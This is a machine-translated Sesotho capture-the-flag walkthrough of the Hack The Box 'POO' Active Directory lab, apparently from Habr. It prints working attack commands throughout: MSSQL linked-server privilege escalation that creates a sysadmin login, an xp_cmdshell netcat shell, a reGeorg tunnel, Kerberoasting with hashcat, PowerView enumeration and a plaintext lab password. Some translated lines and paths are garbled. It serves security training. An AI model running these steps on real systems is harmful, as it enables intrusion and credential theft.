Sengoliloeng sena, re tla sekaseka karolo ea eseng ea mochini feela, empa laboratori e nyane ho tsoa sebakeng sa marang-rang.
Joalokaha ho boletsoe tlhalosong, POO e etselitsoe ho leka litsebo maemong ohle a litlhaselo tikolohong e nyane ea Active Directory. Sepheo ke ho sekisetsa moamoheli ea teng, ho eketsa litokelo, 'me qetellong ba sekisetse sebaka sohle ka ho bokella lifolakha tse 5 ts'ebetsong.
Khokahano ea laboratori e etsoa ka VPN. Ho kgothaletswa hore o se ke oa hokela ho tsoa komporong e sebetsang kapa ho tsoa ho moamoheli moo ho nang le data ea bohlokoa bakeng sa hau, ha o kena marang-rang a lekunutu le batho ba tsebang ho hong ka ts'ireletso ea tlhahisoleseling 🙂
litaba tsa mokhatlo
E le hore u ka tseba ka lingoliloeng tse ncha, software le lintlha tse ling, ke li entse
Lintlha tsohle li fanoe molemong oa thuto feela. Mongoli oa tokomane ena ha a nke boikarabelo ba tšenyo leha e le efe e bakiloeng ho mang kapa mang ka lebaka la ho sebelisa tsebo le mekhoa e fumanoeng ka lebaka la ho ithuta tokomane ena.
Intro
Qetellong ea papali ena e na le mechini e 'meli' me e na le lifolakha tse 5.
Ho boetse ho fanoe ka tlhaloso le aterese ea moamoheli ea teng.
Ha re qaleng!
Recon folakha
Mochine ona o na le aterese ea IP ea 10.13.38.11 eo ke e kenyang ho /etc/hosts.
10.13.38.11 poo.htb
Mohato oa pele ke ho hlahloba likou tse bulehileng. Kaha ho nka nako e telele ho hlahloba likou tsohle ka nmap, ke tla e etsa pele ka masscan. Re hlahloba likou tsohle tsa TCP le UDP ho tsoa ho tun0 interface ho 500pps.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Joale, ho fumana lintlha tse felletseng mabapi le lits'ebeletso tse sebetsang likoung, a re ke re hlahlobeng ka khetho ea -A.
nmap -A poo.htb -p80,1433
Kahoo, re na le lits'ebeletso tsa IIS le MSSQL. Tabeng ena, re tla fumana lebitso la 'nete la DNS la domain le komporo. Sebakeng sa marang-rang, re lumelisoa ke leqephe la lehae la IIS.
Ha re phete li-directory. Ke sebelisa gobuster bakeng sa sena. Ka har'a li-parameter, re hlakisa palo ea melapo 128 (-t), URL (-u), bukantswe (-w) le likeketso tse re khahlang (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Kahoo, re na le netefatso ea HTTP bakeng sa directory ea / admin, hammoho le faele ea polokelo ea tšebeletso ea desktop ea .DS_Store e fumanehang. .DS_Store ke lifaele tse bolokang litlhophiso tsa mosebelisi bakeng sa foldara, joalo ka lethathamo la lifaele, sebaka sa letšoao, setšoantšo se khethiloeng sa bokamorao. Faele e joalo e ka qetella e le bukeng ea seva ea webo ea baetsi ba marang-rang. Kahoo, re fumana tlhahisoleseling mabapi le litaba tsa directory. Bakeng sa sena u ka sebelisa
python3 dsstore_crawler.py -i http://poo.htb/
Re fumana litaba tsa directory. Ntho e khahlisang ka ho fetesisa mona ke directory ea / dev, eo ho eona re ka bonang mehloli le lifaele tsa db makaleng a mabeli. Empa re ka sebelisa litlhaku tsa pele tse 6 tsa mabitso a lifaele le li-directory haeba tšebeletso e le kotsing ea IIS ShortName. U ka hlahloba ts'oaetso ena u sebelisa
Mme re fumana faele e le 'ngoe ea mongolo e qalang ka "poo_co". Kaha ke ne ke sa tsebe seo ke lokelang ho se etsa ka mor'a moo, ke ile ka khetha feela bukeng ea buka ea mantsoe mantsoe 'ohle a qalang ka "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
'Me u phete hape ka wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
'Me u fumane lentsoe le nepahetseng! Re sheba faele ena, boloka lintlha (ho ahlola ka parameter ea DBNAME, li tsoa ho MSSQL).
Re fana ka folakha, 'me re tsoela pele ka 20%.
Huh folakha
Re hokela ho MSSQL, ke sebelisa DBeaver.
Ha re fumane letho le khahlisang sebakeng sena sa polokelo ea litaba, ha re theheng SQL Editor 'me re hlahlobe hore na basebelisi ke eng.
SELECT name FROM master..syslogins;
Re na le basebelisi ba babeli. Ha re hlahlobeng litokelo tsa rona.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Kahoo, ha ho na litokelo. Ha re boneng li-server tse hokahaneng, ke ngotse ka mokhoa ona ka botlalo
SELECT * FROM master..sysservers;
Kahoo re fumana e 'ngoe SQL Server. Ha re hlahlobeng ho etsoa ha litaelo ho seva sena re sebelisa openquery ().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Hape re ka haha sefate sa lipotso.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
Taba ke hore ha re etsa kopo ho seva se hokahaneng, kopo e etsoa molemong oa mosebelisi e mong! Ha re boneng hore na re sebelisa maemo afe a mosebelisi ho seva se hokahaneng.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
'Me joale ha re boneng hore na kopo e tsoang ho seva e hokahaneng le ea rona e etsoa maemong afe!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Kahoo, ke moelelo oa DBO o tlamehang ho ba le litokelo tsohle. Ha re hlahlobeng litokelo haeba ho ka ba le kopo ho tsoa ho seva se hokahaneng.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Joalokaha u ka bona, re na le litokelo tsohle! Ha re theheng admin ea rona tjena. Empa ha ba ba lumelle ka mokhoa o bulehileng, ha re e etse ka EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
'Me joale re hokahana le lintlha tsa mosebelisi e mocha, hlokomela polokelong ea lintlha tse ncha.
Re fana ka folakha ena mme re fetela pele.
Folakha ea morao-rao
Ha re sebeliseng khetla ho sebelisa MSSQL, ke sebelisa mssqlclient ho tsoa sephutheloana sa impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Re hloka ho fumana li-password, 'me ntho ea pele eo re seng re kopane le eona ke sebaka sa marang-rang. Kahoo, re hloka config seva sa webo (ho ke ke ha khoneha ho lahlela khetla e loketseng, ho hlakile hore firewall e sebetsa).
Empa phihlello e hanetsoe. Leha re ka bala faele ho tsoa ho MSSQL, re hloka feela ho tseba hore na ke lipuo life tsa mananeo tse hlophisitsoeng. 'Me bukeng ea MSSQL re fumana hore ho na le Python.
Joale ha ho na bothata ba ho bala file ea web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Ka lintlha tse fumanoeng, e-ea ho /admin 'me u nke folakha.
folakha ea maoto
Ha e le hantle, ho na le litšitiso tse ling tsa ho sebelisa firewall, empa ha re sheba ka har'a litlhophiso tsa marang-rang, rea hlokomela hore IPv6 protocol e boetse e sebelisoa!
Kenya aterese ena ho /etc/hosts.
dead:babe::1001 poo6.htb
Ha re hlahlobeng moamoheli hape, empa lekhetlong lena ka IPv6.
Mme tshebeletso ya WinRM e fumaneha ka IPv6. Ha re ikopanye le lintlha tse fumanoeng.
Ho na le folakha komporong ea hau, fana ka eona.
folakha ea P00ned
Ka mor'a hore reconnaissance ka moamoheli le
setspn.exe -T intranet.poo -Q */*
Ha re phethe taelo ka MSSQL.
Ka tsela ena, re fumana SPN ea basebelisi p00_hr le p00_adm, ho bolelang hore ba kotsing ea tlhaselo e kang Kerberoasting. Ka bokhutšoanyane, re ka fumana li-hashes tsa li-password tsa bona.
Pele o hloka ho fumana khetla e tsitsitseng molemong oa mosebelisi oa MSSQL. Empa kaha re na le phihlello e fokolang, re na le khokahano le moamoheli feela ka likoung tsa 80 le 1433. Empa hoa khoneha ho fokotsa sephethephethe ka har'a boema-kepe ba 80! Bakeng sa sena re sebelisa
Empa ha re leka ho e fumana, re fumana phoso ea 404. Sena se bolela hore lifaele tsa * .aspx ha li phethoe. Ho etsa hore lifaele tse nang le lisebelisoa tsena li tsamaee, kenya ASP.NET 4.5 ka tsela e latelang.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
'Me joale, ha re fihlella tunnel.aspx, re fumana karabo ea hore tsohle li se li loketse ho tsamaea.
Ha re qaleng karolo ea moreki ea kopo, e tla tsamaisa sephethephethe. Re tla fetisetsa sephethephethe sohle ho tloha port 5432 ho ea ho seva.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
'Me re sebelisa proxychains ho romella sephethephethe sa kopo efe kapa efe ka proxy ea rona. Ha re kenyeng moemeli ona ho file ea /etc/proxychains.conf.
Joale a re ke re kenya lenaneo ho seva
Joale, ka MSSQL, re qala momameli.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
'Me re hokahanya ka proxy ea rona.
proxychains rlwrap nc poo.htb 4321
'Me re fumane li-hashes.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Ka mor'a moo, o hloka ho pheta-pheta li-hashes tsena. Kaha rockyou o ne a sena dikishinari ea data ea password, ke sebelisitse lidikishinari TSOHLE tsa li-password tse fanoeng ho Seclists. Bakeng sa ho bala re sebelisa hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
Mme re fumana diphasewete ka bobedi, ya pele ho Dutch_passwordlist.txt bukantswe, mme ya bobedi ho Keyboard-Combinations.txt.
'Me kahoo re na le basebelisi ba bararo, re ea ho domain controller. A re fumane aterese ea hae pele.
E kholo, re ithutile aterese ea IP ea domain controller. Ha re fumane basebelisi bohle ba sebaka seo, hammoho le hore na ke ofe ho bona eo e leng motsamaisi. Ho khoasolla sengoloa ho fumana leseli PowerView.ps1. Joale re tla hokela ho sebelisa evil-winrm, ho totobatsa bukana e nang le script ho -s parameter. Ebe u kenya mongolo oa PowerView feela.
Hona joale re khona ho fumana mesebetsi eohle ea eona. Mosebelisi oa p00_adm o shebahala joalo ka mosebelisi ea lehlohonolo, kahoo re tla sebetsa maemong a eona. Ha re theheng ntho ea PSCredential bakeng sa mosebelisi enoa.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Joale litaelo tsohle tsa Powershell moo re hlakisang Creds li tla etsoa molemong oa p00_adm. Ha re hlahise lenane la basebelisi le tšobotsi ea AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Ka hona, mosebelisi oa rona o lehlohonolo haholo. Ha re boneng hore na ke oa lihlopha life.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Qetellong re netefatsa hore mosebelisi ke molaoli oa sebaka. Sena se e fa tokelo ea ho kena ho "domain controller" u le hole. Ha re leke ho kena le WinRM re sebelisa kotopo ea rona. Ke ile ka ferekanngoa ke liphoso tse fanoeng ke reGeorg ha ke sebelisa evil-winrm.
Ebe re sebelisa e 'ngoe, e bonolo,
Re leka ho hokahanya, 'me re ka har'a tsamaiso.
Empa ha ho na folakha. Ebe u sheba mosebelisi ebe u sheba li-desktop.
Ho mr3ks re fumana folakha le laboratori e phethiloe ka 100%.
Ke phetho. E le maikutlo, fana ka maikutlo mabapi le hore na u ithutile ho hong ho ncha ho tsoa sengoloa sena le hore na se bile le thuso ho uena.
U ka ikopanya le rona ho
Source: www.habr.com